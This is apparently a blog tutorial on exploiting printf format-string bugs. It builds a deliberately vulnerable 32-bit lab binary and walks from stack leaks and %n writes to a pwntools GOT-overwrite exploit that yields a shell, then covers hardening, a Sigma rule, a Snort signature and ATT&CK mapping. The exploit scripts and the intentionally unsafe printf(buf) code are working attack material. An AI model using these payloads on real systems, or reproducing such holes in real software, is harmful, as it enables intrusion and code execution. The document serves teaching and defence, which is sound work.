Format String Vulnerabilities: Read/Write Primitives via printf Internals
You control a string. The program hands it straight to printf with no format argument of its own. That one missing "%s" is enough to read any mapped address in the process and write any value you like to any writable address. No buffer overflow, no canary to defeat, no return address to smash. Just printf doing exactly what the C standard told it to do, on data it should never have trusted.
This walkthrough takes the bug from first principles to a shell on a 32-bit Linux lab binary, then shows the blue-team side: why almost nothing on the host fires until the shell spawns, and what you key your detections off instead.
Contents
- 1 1. The Format String Contract
- 2 2. Building the Vulnerable Lab Target
- 3 3. The Read Primitive: Leaking Stack Memory
- 4 4. Locating Your Buffer on the Stack
- 5 5. The Write Primitive: %n Mechanics
- 6 6. Targeting the GOT
- 7 7. The Full Exploit (pwntools)
- 8 8. Manual Split-Write Without Helpers
- 9 9. 64-bit Complications
- 10 10. Mitigations, Bypass Strategies, and Hardening
- 11 11. Common Attacker Techniques
- 12 12. Defensive Strategies & Detection
- 13 13. Tools for Format String Analysis
- 14 14. MITRE ATT&CK Mapping
- 15 Summary
- 16 Related Tutorials
- 17 References
1. The Format String Contract
printf is variadic. Its prototype is int printf(const char *fmt, ...), and the C runtime has no idea how many arguments follow fmt. It learns that at runtime, by parsing fmt and counting conversion specifiers. Each %-specifier tells glibc’s _IO_vfprintf to pull the next argument off the variadic list and format it.
On x86-32 (cdecl), those arguments live on the stack, immediately above the format string pointer. _IO_vfprintf walks them with the va_list / va_arg iterator. There is no bounds check. If the format string says “give me ten arguments” but the caller passed none, printf cheerfully reads ten stack slots that belong to other locals, saved registers, return addresses, and library pointers.
On x86-64 System V, the first six integer arguments are passed in registers (rdi holds fmt, then rsi, rdx, rcx, r8, r9), and only the seventh argument onward sits on the stack. That register detail changes the offsets you use but not the bug.
| Item | Description |
|---|---|
printf(fmt, ...) | Variadic; interprets fmt and fetches one argument per specifier from the stack (x86-32) or registers then stack (x86-64) |
| Vulnerable call | printf(user_input) gives the attacker both a read primitive (%x/%p/%s) and a write primitive (%n) |
| Safe equivalent | printf("%s", user_input) – the fix is one literal format string |
| Affected family | printf, fprintf, sprintf, snprintf, vprintf, vsprintf, syslog |
The whole printf family routes through _IO_vfprintf, so the bug is identical wherever a user-controlled buffer reaches the format-string slot. syslog(LOG_INFO, user_input) is the same vulnerability with a different front door.
| Specifier | Primitive | Mechanics |
|---|---|---|
%x / %p | Stack read | Pops the next stack slot, prints it as hex |
%s | Arbitrary read | Treats the next slot as char *, reads until \0 |
%n | Arbitrary write (4 bytes) | Stores the count of bytes written so far into the int * argument |
%hn | Write 2 bytes | Stores a short; used in split-write chains |
%hhn | Write 1 byte | Stores one byte; best for null-byte-free GOT patching |
%<k>$<spec> | Direct parameter access | %7$p reads argument 7 directly, no throwaway chain |
%<N>x | Value control | Emitting N bytes before %n makes %n write N |

2. Building the Vulnerable Lab Target
Here is the whole target. It is intentionally broken, and the compile flags are deliberately weak so the mechanics are visible. Do not ship anything built this way.
// target.c - deliberately vulnerable lab binary
// Compile:
// gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void win() {
system("/bin/sh"); // redirect here via GOT overwrite
}
void log_input(char *buf) {
printf("[LOG] ");
printf(buf); // VULNERABLE: user-controlled format string
printf("\n");
}
int main(void) {
char input[256];
printf("Input: ");
fgets(input, sizeof(input), stdin);
input[strcspn(input, "\n")] = '\0';
log_input(input);
exit(0); // exit() calls fini/dtors -> alternative target
}
Build it and confirm the protections are down:
gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c
checksec --file=./target
# RELRO: No RELRO | Stack: No canary | NX: enabled | PIE: No PIE
-no-pie fixes the binary’s base so addresses are stable for teaching. -z norelro keeps the GOT writable. The stack canary is irrelevant to a format-string write because we never smash the stack, but disabling it removes noise. win() is our jump target: redirect a GOT entry there and the program calls system("/bin/sh") for us.
3. The Read Primitive: Leaking Stack Memory
Start by watching printf leak the stack. Feed it a chain of %p:
python3 -c "print('AAAA.' + '.'.join(['%p']*10))" | ./target
# [LOG] AAAA.0xf7f...c.0x8.0x80491b6.0x41414141.0x70252e70.0x252e7025...
Every %p consumes one stack slot and prints it. Mixed in you will see libc pointers (high 0xf7... addresses on 32-bit), small loop counters, the return address back into main, and crucially 0x41414141, which is our AAAA showing up because the input buffer itself is sitting on the stack printf is walking.
Positional access cleans this up. Instead of counting %ps by hand, ask for one slot directly:
python3 -c "print('AAAA%7\$p')" | ./target
# [LOG] AAAA0x41414141
%7$p says “format argument number 7 as a pointer.” When it prints 0x41414141, you have found the slot that holds the first four bytes of your own buffer. That index, 7 here, is the single most important number in the exploit. It is the bridge that turns an uncontrolled read into a controlled one.
For arbitrary reads, %s dereferences the slot as a char *. Place an address in your buffer at the slot you control, then point %s at it:
python3 -c "
import struct, sys
got_exit = 0x0804c014 # from objdump -R, see Step below
sys.stdout.buffer.write(struct.pack('<I', got_exit) + b'%7\$s')
" | ./target | xxd
Now %7$s reads the four bytes at offset 7 (your embedded address) as a pointer and dumps whatever string lives there. That is your arbitrary read: leak GOT entries, leak libc, leak anything mapped.
4. Locating Your Buffer on the Stack
The offset hunt is mechanical. Send a marker plus a positional read, and bump the index until the marker echoes back:
for i in $(seq 1 15); do
echo -n "offset $i: "
python3 -c "print('AAAA%$i\$p')" | ./target | grep -o '0x[0-9a-f]*'
done
When the output reads 0x41414141, that index is your offset to self. On this binary with this stack layout it is 7. Verify under the debugger if you want certainty:
pwndbg> r <<< $(python3 -c "print('AAAA.%7\$p')")
pwndbg> x/40wx $esp
One gotcha worth internalizing now: the offset is layout-dependent. Add or remove a local, change the compiler version, or rebuild without -m32, and your golden number shifts. I once burned an afternoon on a payload that “stopped working” after a recompile, only to discover an extra stack-aligned local had pushed my buffer from offset 6 to offset 7. Re-derive the offset every time the binary changes.
5. The Write Primitive: %n Mechanics
%n is the part of the C standard that should keep you up at night. It does not print anything. It takes the corresponding argument as an int * and stores the number of characters printf has emitted so far into that address.
So if you can place a target address in a stack slot you control, and you make printf emit exactly N bytes before the %n, you write the value N to that address. Width specifiers give you the byte count for free: %100x prints a value padded to 100 characters, advancing the counter to 100.
Writing a full 32-bit address with one %n would mean printing up to four billion padding characters. Nobody waits for that. Split the write:
%hnwrites the low 16 bits (ashort).%hhnwrites the low 8 bits (a single byte).
To plant a 4-byte value you do two %hn writes, one to addr and one to addr+2, padding each to the half-word you need. Because the lower half is sometimes numerically larger than the upper half, you order the writes so the running byte count only ever increases, and you account for the bytes already emitted by the embedded addresses themselves.
That bookkeeping is exactly the kind of off-by-a-few error that eats hours, which is why the next sections use both the pwntools helper (does the math for you) and a manual derivation (so you understand what the helper emitted).
6. Targeting the GOT
Lazy binding means each imported function is called through the Global Offset Table. The .plt stub is read-only, but .got.plt holds the resolved (or to-be-resolved) address and, without RELRO, it is writable. Overwrite the GOT entry of a function that gets called after your format string runs, and you redirect control.
exit() is perfect here: main calls exit(0) right after log_input returns, so we overwrite exit‘s GOT slot with the address of win.
Find the addresses:
objdump -R ./target | grep -E 'exit|printf'
# 0804c014 R_386_JUMP_SLOT exit@GLIBC_2.0
readelf -s ./target | grep ' win'
# 42: 080491d6 ... FUNC GLOBAL DEFAULT win
In pwndbg you can read the live table and confirm the write afterward:
pwndbg> got
pwndbg> x/wx 0x0804c014 # exit GOT entry, before write
0x804c014: 0x0804c014 # unresolved -> points back at PLT resolver
Target slot: 0x0804c014. Value to write: 0x080491d6. That is the whole shape of the attack.

7. The Full Exploit (pwntools)
fmtstr_payload builds the split-write payload, computes the padding, and accounts for already-written bytes. Let pwntools resolve the symbols from the ELF so you never hardcode a stale address.
# exploit.py
from pwn import *
context.binary = elf = ELF('./target')
context.arch = 'i386'
p = process('./target')
win_addr = elf.symbols['win'] # 0x080491d6
got_exit = elf.got['exit'] # 0x0804c014
offset = 7 # found in Section 4
# Build the crafted format string: embedded address + width-padded %hn writes
payload = fmtstr_payload(offset, {got_exit: win_addr}, write_size='short')
log.info("Payload (%d bytes): %r", len(payload), payload)
p.sendlineafter(b'Input: ', payload)
p.interactive()
Run it:
$ python3 exploit.py
[*] '/home/lab/target'
Arch: i386-32-little
RELRO: No RELRO
[+] Starting local process './target'
[*] Switching to interactive mode
$ id
uid=1000(lab) gid=1000(lab) groups=1000(lab)
$ cat /etc/hostname
fmt-lab
When main reaches exit(0), the PLT stub jumps through the now-poisoned GOT entry into win, and system("/bin/sh") hands you a shell. Confirm the overwrite landed before exit runs by breaking on it in pwndbg and re-reading 0x0804c014; it should now read 0x080491d6.
8. Manual Split-Write Without Helpers
To see what pwntools emitted, write a value by hand. Take a generic example: write 0xdeadbeef to address A.
- Low half
0xbeef= 48879 toA - High half
0xdead= 57005 toA+2
Order the writes ascending by value so the counter only grows: 0xdead (57005) is larger than 0xbeef (48879), so write 0xbeef first, then top up to 0xdead.
Layout, at offset 7 for the addresses:
[ A ][ A+2 ] <- 8 bytes of embedded addresses
%<48879-8>x %7$hn <- count reaches 0xbeef, write low half to A
%<57005-48879>x %8$hn <- count reaches 0xdead, write high half to A+2
The -8 accounts for the eight bytes the two packed addresses already printed. After the first %hn, the counter sits at 48879, so the second pad only adds 57005 - 48879 characters to climb to 57005.
For our real target the value is win = 0x080491d6: low half 0x91d6 (37334), high half 0x0804 (2052). Because the high half is the smaller number, you flip the write order: write 0x0804 to A+2 first, then pad up to 0x91d6 and write to A. That ordering decision is precisely the arithmetic fmtstr_payload handles for you, and exactly where hand-rolled payloads go wrong.
For GOT patching where you want to avoid carrying values across half-word boundaries, prefer four %hhn byte writes (write_size='byte'). It produces a longer string but sidesteps the ascending-order headache entirely.
9. 64-bit Complications
Move to x86-64 and three things change.
First, the calling convention. The first five format arguments are pulled from rsi, rdx, rcx, r8, r9, so your stack-resident buffer typically first appears around offset %6$ or later. Re-run the offset hunt; do not assume 7.
Second, null bytes. A 64-bit address like 0x0000555555554abc is full of \0 bytes. As a C string, the first null terminates your input, truncating the payload before your address is even read. You cannot place raw 64-bit addresses inline the way you did on 32-bit.
Third, the fix. Use byte-granular writes with %hhn so each write target is reachable without embedding null-laden 8-byte values, and let pwntools place the addresses after the format directives where the truncation no longer matters:
context.arch = 'amd64'
payload = fmtstr_payload(offset, {elf.got['exit']: win_addr},
write_size='byte') # emits %hhn, null-safe ordering
fmtstr_payload knows the ABI and arranges the address table after the format specifiers, so the early null bytes never sit in front of a directive you still need to parse.
10. Mitigations, Bypass Strategies, and Hardening
| Mitigation | Effect on Exploit |
|---|---|
| Full RELRO | GOT becomes read-only after linking; GOT overwrite dies |
| ASLR | Randomises libc/stack/heap; need an info-leak first |
| PIE | Randomises binary base; leak base before writing |
| Stack canary | Irrelevant to %n writes unless you target saved $eip directly |
-Wformat-security | Flags printf(user) at compile time |
_FORTIFY_SOURCE=2 | Aborts on %n in a writable-memory format string in many configs; not a full block |
The read primitive is the universal solvent here. ASLR and PIE only force an ordering: leak before you write. Use %p or %s to pull a libc pointer or the binary base out of the GOT, subtract the known static offset, and compute the live address you actually want. Then build the write with that resolved value.
When Full RELRO closes the GOT, change targets, not techniques. Historically __malloc_hook and __free_hook were favorite writable function pointers, but both were removed in glibc 2.34, so they no longer exist on modern systems. The durable modern target is .fini_array: the destructor pointer array that exit() walks on the way out. Overwrite an entry there and you get control on normal program exit even with the GOT locked. Saved return addresses on the stack remain an option when the layout is predictable and ASLR is leaked.
For defenders, the class is eliminable, not merely mitigable:
- Compile with
-Wformat=2 -Wformat-security -Werror=format-securityand fail the build on any hit. - Enable
_FORTIFY_SOURCE=2in release builds. - Link Full RELRO:
-Wl,-z,relro,-z,now. - Deploy PIE and ASLR together.
- SAST it:
semgrepforprintf(var), CodeQLcpp/tainted-format-string,flawfinder. A blunt grep finds most of it:grep -rn "printf(" --include="*.c" | grep -v '"%'. - Sandbox with seccomp so a service process cannot
execvea shell even if its GOT is poisoned.

11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Stack read chain | %p%p%p or %n$p to leak addresses, canaries, and libc base |
| Arbitrary read | Embedded address plus %s to dump any mapped string |
| GOT overwrite | %hn/%hhn write redirects a soon-to-be-called import |
.fini_array overwrite | RELRO-resistant write that fires destructors at exit() |
| Saved return overwrite | %n to a saved $eip/$rip when the stack is predictable |
| IDS evasion | Encoding or fragmenting %n/%x to dodge signature matching |
12. Defensive Strategies & Detection
Be honest about the telemetry: nothing on the host directly observes a malformed printf string. Detection is behavioral and lands on what happens after the GOT overwrite, plus crash artifacts from failed attempts.
| Signal | Source | Detail |
|---|---|---|
| Sysmon Event ID 1 (Process Create) | Sysmon | A daemon spawning /bin/sh or cmd.exe; pivot on ParentImage, ParentCommandLine |
| Sysmon Event ID 3 (Network Connection) | Sysmon | Post-exploit C2 from an exploited service |
| Sysmon Event ID 8 (CreateRemoteThread) | Sysmon | Shellcode threading into the victim after shell |
| Sysmon Event ID 11 (File Create) | Sysmon | Dropper staged to disk post-shell |
Auditd execve | auditd | -a always,exit -F arch=b32 -S execve catches execve("/bin/sh") |
ETW Microsoft-Windows-Kernel-Process | ETW | Anomalous parent to child lineage on Windows targets |
| Application crash logs | OS/app | A failed %s deref segfaults; correlate SIGSEGV with prior input carrying %x/%n/%s |
The high-value detection is parent-child lineage: a network service that has no business forking a shell suddenly becoming /bin/sh‘s parent.
title: Shell Spawned from Non-Interactive Service Process
status: experimental
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/sh'
- '/bash'
- '/dash'
ParentImage|contains:
- 'httpd'
- 'nginx'
- 'sshd'
- 'target'
condition: selection
fields:
- Image
- ParentImage
- ParentCommandLine
- CommandLine
falsepositives:
- Legitimate admin shell invocations
level: high
tags:
- attack.execution
- attack.t1203
For network-exposed services, catch the probe at the input layer. Sequences of %x, %p, %n, %s, %hn, %hhn, or %<digit>$ direct-parameter syntax are strong indicators of format-string fuzzing:
alert tcp any any -> $HOME_NET any (
msg:"FORMAT STRING PROBE - %n or %x sequence in payload";
content:"%n"; nocase;
sid:9000001; rev:1;
)
Treat input-layer signatures as tripwires, not gates. They are trivially encoded around, which is why hardening (RELRO, FORTIFY, seccomp) is the real control.

13. Tools for Format String Analysis
| Tool | Description | Link |
|---|---|---|
| pwntools | Exploit automation; fmtstr_payload builds the writes | docs.pwntools.com |
| checksec | Enumerates RELRO/PIE/canary/NX | github.com |
| objdump / readelf | GOT relocations and symbol addresses | gnu.org |
| GDB + pwndbg | got, stack inspection, write verification | github.com |
| ltrace | Watch the live printf arguments | ltrace.org |
| Ghidra | Static review of printf call sites | ghidra-sre.org |
| semgrep / flawfinder | SAST for printf(var) patterns | semgrep.dev |
14. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Crash logs, anomalous child processes from a vulnerable parent |
| Hijack Execution Flow | T1574 | GOT / .fini_array overwrite redirecting control |
| Process Injection | T1055 | Sysmon Event ID 8 after the shell lands |
| System Information Discovery | T1082 | %p read primitive enumerating stack/libc addresses |
| Deobfuscate/Decode Information | T1140 | Encoded format payloads dodging IDS signatures |
ATT&CK has no dedicated technique for format-string bugs specifically. The correct parents are T1203 for the execution and T1574 for the control-flow hijack; do not invent a sub-technique ID.
Summary
- A user-controlled
printfformat string is a full read/write primitive, not a crash bug. The missing"%s"lets the attacker drive_IO_vfprintf‘s argument walk directly. %p/%sleak arbitrary memory;%n/%hn/%hhnwrite arbitrary values, with width specifiers controlling exactly what gets written.- The offset to your own buffer is the master key – find it with
%N$p, then point reads and writes wherever you choose. - GOT overwrite to
wingives a shell on the lab binary; under Full RELRO, pivot to.fini_array(the old__malloc_hook/__free_hooktargets are gone as of glibc 2.34). - Detection is behavioral and post-exploitation – watch service processes spawning shells (Sysmon Event ID 1, auditd
execve), and kill the class at the source with-Werror=format-security, Full RELRO, FORTIFY, and seccomp.
Related Tutorials
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
References
- glibc
_IO_vfprintfinternals,va_list/va_argmechanics → verify against glibc source fmtstr_payloadAPI → verify against pwntools documentation- codearcana.com
- www.gyanbyte.com
- medium.com
- owasp.org
- ctf101.org
- www.kayssel.com
Get new drops in your inbox
Windows internals, exploit dev, and red-team write-ups - no spam, unsubscribe anytime.